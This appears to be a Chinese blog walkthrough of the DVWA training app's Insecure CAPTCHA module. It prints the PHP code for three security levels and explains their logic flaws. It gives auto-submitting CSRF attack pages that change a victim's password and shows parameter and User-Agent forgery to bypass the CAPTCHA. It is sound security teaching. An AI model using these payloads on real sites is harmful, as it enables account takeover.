DVWA简介

DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。

DVWA共有十个模块,分别是Brute Force(暴力(破解))、Command Injection(命令行注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAPTCHA(不安全的验证码)、SQL Injection(SQL注入)、SQL Injection(Blind)(SQL盲注)、XSS(Reflected)(反射型跨站脚本)、XSS(Stored)(存储型跨站脚本)。

需要注意的是,DVWA 1.9的代码分为四种安全级别:Low,Medium,High,Impossible。初学者可以通过比较四种级别的代码,接触到一些PHP代码审计的内容。

Insecure CAPTCHA

Insecure CAPTCHA,意思是不安全的验证码,CAPTCHA是Completely Automated Public Turing Test to Tell Computers and Humans Apart (全自动区分计算机和人类的图灵测试)的简称。但个人觉得,这一模块的内容叫做不安全的验证流程更妥当些,因为这块主要是验证流程出现了逻辑漏洞,谷歌的验证码表示不背这个锅。

reCAPTCHA验证流程

这一模块的验证码使用的是Google提供reCAPTCHA服务,下图是验证的具体流程。

服务器通过调用recaptcha_check_answer函数检查用户输入的正确性。

recaptcha_check_answer($privkey,$remoteip, $challenge,$response)

参数$privkey是服务器申请的private key,$remoteip是用户的ip,$challenge是recaptcha_challenge_field字段的值,来自前端页面 ,$response是recaptcha_response_field字段的值。函数返回ReCaptchaResponse class的实例,ReCaptchaResponse类有2个属性 :

$is_valid是布尔型的,表示校验是否有效,

$error是返回的错误代码。

在正式开始之前,我们进入这个模块,可能会遇到不能正常显示的情况。

百度报错信息,需要在配置文件中加入谷歌的密钥:

$_DVWA[ 'recaptcha_public_key' ]  = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';

密钥可以去谷歌去生成,但是需要FQ,这里就直接用的网上的。

LOW级别:
代码:

<?php 

if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) {

    // Hide the CAPTCHA form

    $hide_form = true; 

    // Get input

    $pass_new  = $_POST[ 'password_new' ];

    $pass_conf = $_POST[ 'password_conf' ]; 

    // Check CAPTCHA from 3rd party

    $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key' ],

        $_SERVER[ 'REMOTE_ADDR' ],

        $_POST[ 'recaptcha_challenge_field' ],

        $_POST[ 'recaptcha_response_field' ] ); 

    // Did the CAPTCHA fail?

    if( !$resp->is_valid ) {

        // What happens when the CAPTCHA was entered incorrectly

        $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";

        $hide_form = false;

        return;

    }

    else {

        // CAPTCHA was correct. Do both new passwords match?

        if( $pass_new == $pass_conf ) {

            // Show next stage for the user

            echo "

                <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre>

                <form action=\"#\" method=\"POST\">

                    <input type=\"hidden\" name=\"step\" value=\"2\" />

                    <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" />

                    <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" />

                    <input type=\"submit\" name=\"Change\" value=\"Change\" />

                </form>";

        }

        else {

            // Both new passwords do not match.

            $html     .= "<pre>Both passwords must match.</pre>";

            $hide_form = false;

        }

    }

} 

if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) {

    // Hide the CAPTCHA form

    $hide_form = true; 

    // Get input

    $pass_new  = $_POST[ 'password_new' ];

    $pass_conf = $_POST[ 'password_conf' ]; 

    // Check to see if both password match

    if( $pass_new == $pass_conf ) {

        // They do!

        $pass_new = mysql_real_escape_string( $pass_new );

        $pass_new = md5( $pass_new ); 

        // Update database

        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";

        $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); 

        // Feedback for the end user

        echo "<pre>Password Changed.</pre>";

    }

    else {

        // Issue with the passwords matching

        echo "<pre>Passwords did not match.</pre>";

        $hide_form = false;

    } 

    mysql_close();

} 

?>

可以看到,服务器将改密操作分成了两步,第一步检查用户输入的验证码,验证通过后,服务器返回表单,第二步客户端提交post请求,服务器完成更改密码的操作。但是,这其中存在明显的逻辑漏洞,服务器仅仅通过检查Change、step 参数来判断用户是否已经输入了正确的验证码。

漏洞利用1:

通过构造参数绕过验证过程:

首先输入新的密码,然后change之后再抓包:

(ps:因为没有FQ,所以没能成功显示验证码,发送的请求包中也就没有recaptcha_challenge_field、recaptcha_response_field两个参数)

更改step参数绕过验证码:

修改密码成功:

漏洞利用2:由于没有任何的防CSRF机制,我们可以轻易地构造攻击页面,页面代码如下

<html>      

<body onload="document.getElementById('transfer').submit()">        

  <div>    

    <form method="POST" id="transfer" action="http://192.168.5.100/dvwa/vulnerabilities/captcha/">     

        <input type="hidden" name="password_new" value="password">

        <input type="hidden" name="password_conf" value="password">     

        <input type="hidden" name="step" value="2"      

        <input type="hidden" name="Change" value="Change">        

    </form>        

  </div>        

</body>

</html>

当受害者访问这个页面时,攻击脚本会伪造改密请求发送给服务器。但是受害者会看到更改密码成功的界面(这是因为修改密码成功后,服务器会返回302,实现自动跳转),从而意识到自己遭到了攻击。

Medium

代码:

<?php 

if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) {

    // Hide the CAPTCHA form

    $hide_form = true; 

    // Get input

    $pass_new  = $_POST[ 'password_new' ];

    $pass_conf = $_POST[ 'password_conf' ]; 

    // Check CAPTCHA from 3rd party

    $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key' ],

        $_SERVER[ 'REMOTE_ADDR' ],

        $_POST[ 'recaptcha_challenge_field' ],

        $_POST[ 'recaptcha_response_field' ] ); 

    // Did the CAPTCHA fail?

    if( !$resp->is_valid ) {

        // What happens when the CAPTCHA was entered incorrectly

        $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";

        $hide_form = false;

        return;

    }

    else {

        // CAPTCHA was correct. Do both new passwords match?

        if( $pass_new == $pass_conf ) {

            // Show next stage for the user

            echo "

                <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre>

                <form action=\"#\" method=\"POST\">

                    <input type=\"hidden\" name=\"step\" value=\"2\" />

                    <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" />

                    <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" />

                    <input type=\"hidden\" name=\"passed_captcha\" value=\"true\" />

                    <input type=\"submit\" name=\"Change\" value=\"Change\" />

                </form>";

        }

        else {

            // Both new passwords do not match.

            $html     .= "<pre>Both passwords must match.</pre>";

            $hide_form = false;

        }

    }

} 

if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) {

    // Hide the CAPTCHA form

    $hide_form = true; 

    // Get input

    $pass_new  = $_POST[ 'password_new' ];

    $pass_conf = $_POST[ 'password_conf' ]; 

    // Check to see if they did stage 1

    if( !$_POST[ 'passed_captcha' ] ) {

        $html     .= "<pre><br />You have not passed the CAPTCHA.</pre>";

        $hide_form = false;

        return;

    } 

    // Check to see if both password match

    if( $pass_new == $pass_conf ) {

        // They do!

        $pass_new = mysql_real_escape_string( $pass_new );

        $pass_new = md5( $pass_new ); 

        // Update database

        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";

        $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); 

        // Feedback for the end user

        echo "<pre>Password Changed.</pre>";

    }

    else {

        // Issue with the passwords matching

        echo "<pre>Passwords did not match.</pre>";

        $hide_form = false;

    } 

    mysql_close();

} 

?>

可以看到,Medium级别的代码在第二步验证时,参加了对参数passed_captcha的检查,如果参数值为true,则认为用户已经通过了验证码检查,然而用户依然可以通过伪造参数绕过验证,本质上来说,这与Low级别的验证没有任何区别。

修改密码抓包:

改包:增加passed_captcha参数,绕过验证码。

更改密码成功:

漏洞利用2:同样也可以使用CSRF攻击界面在方式:

<html>       

<body onload="document.getElementById('transfer').submit()">       

  <div>      

    <form method="POST" id="transfer" action="http://192.168.5.100/dvwa/vulnerabilities/captcha/">       

        <input type="hidden" name="password_new" value="password">

        <input type="hidden" name="password_conf" value="password">        

        <input type="hidden" name="passed_captcha" value="true">        

        <input type="hidden" name="step" value="2">       

        <input type="hidden" name="Change" value="Change">        

    </form>        

  </div>

</body>        

</html>

High:

代码:

<?php 

if( isset( $_POST[ 'Change' ] ) ) {

    // Hide the CAPTCHA form

    $hide_form = true; 

    // Get input

    $pass_new  = $_POST[ 'password_new' ];

    $pass_conf = $_POST[ 'password_conf' ]; 

    // Check CAPTCHA from 3rd party

    $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key' ],

        $_SERVER[ 'REMOTE_ADDR' ],

        $_POST[ 'recaptcha_challenge_field' ],

        $_POST[ 'recaptcha_response_field' ] ); 

    // Did the CAPTCHA fail?

    if( !$resp->is_valid && ( $_POST[ 'recaptcha_response_field' ] != 'hidd3n_valu3' || $_SERVER[ 'HTTP_USER_AGENT' ] != 'reCAPTCHA' ) ) {

        // What happens when the CAPTCHA was entered incorrectly

        $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";

        $hide_form = false;

        return;

    }

    else {

        // CAPTCHA was correct. Do both new passwords match?

        if( $pass_new == $pass_conf ) {

            $pass_new = mysql_real_escape_string( $pass_new );

            $pass_new = md5( $pass_new ); 

            // Update database

            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "' LIMIT 1;";

            $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); 

            // Feedback for user

            echo "<pre>Password Changed.</pre>";

        }

        else {

            // Ops. Password mismatch

            $html     .= "<pre>Both passwords must match.</pre>";

            $hide_form = false;

        }

    } 

    mysql_close();

}

// Generate Anti-CSRF token

generateSessionToken(); 

?>

可以看到,服务器的验证逻辑是当$resp(这里是指谷歌返回的验证结果)是false,并且参数g-recaptcha-response不等于hidd3n_valu3(或者http包头的User-Agent参数不等于reCAPTCHA)时,就认为验证码输入错误,反之则认为已经通过了验证码的检查。

漏洞利用:$resp参数我们无法控制,所以重心放在参数g-recaptcha-response、User-Agent上。

抓包拿到数据:

更改参数g-recaptcha-response以及http包头的User-Agent:

修改成功:

DVWA-全等级验证码Insecure CAPTCHA的更多相关文章

  1. DVWA全级别之Insecure CAPTCHA(不安全的验证码)

    Insecure CAPTCHA Insecure CAPTCHA,意思是不安全的验证码,CAPTCHA是Completely Automated Public Turing Test to Tell ...

  2. (十二)DVWA全等级SQL Injection(Blind)盲注--SQLMap测试过程解析

    一.测试前分析 前文<DVWA全等级SQL Injection(Blind)盲注-手工测试过程解析> 通过手工测试的方式详细分析了SQL Injection(Blind)盲注漏洞的利用过程 ...

  3. DVWA 黑客攻防演练(六)不安全的验证码 Insecure CAPTCHA

    之前在 CSRF 攻击 的那篇文章的最后,我觉得可以用验证码提高攻击的难度. 若有验证码的话,就比较难被攻击者利用 XSS 漏洞进行的 CSRF 攻击了,因为要识别验证码起码要调用api,跨域会被浏览 ...

  4. (十一)DVWA全等级SQL Injection(Blind)盲注--手工测试过程解析

    一.DVWA-SQL Injection(Blind)测试分析 SQL盲注 VS 普通SQL注入: 普通SQL注入 SQL盲注 1.执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提 ...

  5. 不安全的验证码Insecure CAPTCHA

    没啥好讲的,当验证不合格时,通过burp抓包工具修改成符合要求的数据包.修改参数标志位.USER-AGENT之类的参数. 防御 加强验证,Anti-CSRF token机制防御CSRF攻击,利用PDO ...

  6. 安全性测试入门 (五):Insecure CAPTCHA 验证码绕过

    本篇继续对于安全性测试话题,结合DVWA进行研习. Insecure Captcha不安全验证码 1. 验证码到底是怎么一回事 这个Captcha狭义而言就是谷歌提供的一种用户验证服务,全称为:Com ...

  7. DVWA(二): Brute Force(全等级暴力破解)

    tags: DVWA Brute Force Burp Suite Firefox windows2003 暴力破解基本利用密码字典使用穷举法对于所有的账号密码组合全排列猜解出正确的组合. LEVEL ...

  8. DVWA-全等级暴力破解

    之前写了dvwa的sql注入的模块,现在写一下DVWA的其他实验步骤: 环境搭建参考:https://www.freebuf.com/sectool/102661.html DVWA简介 DVWA(D ...

  9. DVWA之Insecure Captcha

    Insecure CAPTCHA Insecure CAPTCHA,意思是不安全的验证码,CAPTCHA是Completely Automated Public Turing Test to Tell ...

随机推荐

  1. 从三道题目入门frida

    偶然从看雪看到了一篇入门frida的题目,正好苦于没练手的东西,直接上手一波 1.第一题jadx打开,也没有壳和混淆,整体非常清晰,判断的逻辑也很简单 发现其实就是两个输入框,一个用户名一个密码,先拼 ...

  2. F5 Http monitor

    The BIG-IP HTTP health monitor attempts to mabtch the configured Receive String against the HTTP res ...

  3. SpringBoot配置Https

    HTTPS (全称:Hyper Text Transfer Protocol over SecureSocket Layer),是以安全为目标的 HTTP 通道,在HTTP的基础上通过传输加密和身份认 ...

  4. 【论文阅读】DSDNet Deep Structured self-Driving Network

    前言引用 [2] DSDNet Deep Structured self-Driving Network Wenyuan Zeng, Shenlong Wang, Renjie Liao, Yun C ...

  5. 论文阅读:Visual-Inertial Localization With Prior LiDAR Map Constraints

    介绍 提出了一个低代价双目视觉惯导定位系统,实现了基于多状态约束下的卡尔曼滤波器(MSCKF)VIO,采用了先验雷达地图.除了稀疏的视觉特征,雷达地图与半稠密的点云也通过紧耦合的MSCKF进行更新,进 ...

  6. 写了这么多年 CSS,initial 和 inherit 以及 unset 和 revert 还傻傻分不清楚?

    经常会碰到,问一个 CSS 属性,例如 position 有多少取值. 通常的回答是 static.relative.absolute 和 fixed .当然,还有一个稍微生僻的 sticky .其实 ...

  7. Python基础之魔术方法(控制属性的访问和设置)

    # 魔术方法--常规方法# 1. __int__ 构造函数# 2. __new__ 在类实例之前就创建了# 3. __iter__ 迭代器# 4. __del__ 析构方法,用来清除释放的对象内存# ...

  8. python -- 面向对象编程(类、对象)

    一.类 类是用来描述具有相同的属性和方法的对象的集合. 它定义了该集合中每个对象共同拥有的属性和方法. 类是一个独立的单位,它有一个类名,其内部包括成员变量和成员方法,分别用于描述对象的属性和行为. ...

  9. [JS]闭包和词法环境

    词法环境 词法环境(lexical environment)由两个部分组成: 环境记录--一个存储所有局部变量作为其属性的对象. 对外部词法环境的引用,与外部代码相关联. 全局词法环境在脚本执行前创建 ...

  10. 【LeetCode】404. 左叶子之和

    404. 左叶子之和 知识点:二叉树 题目描述 计算给定二叉树的所有左叶子之和.. 示例 3 / \ 9 20 / \ 15 7 在这个二叉树中,有两个左叶子,分别是 9 和 15,所以返回 24 解 ...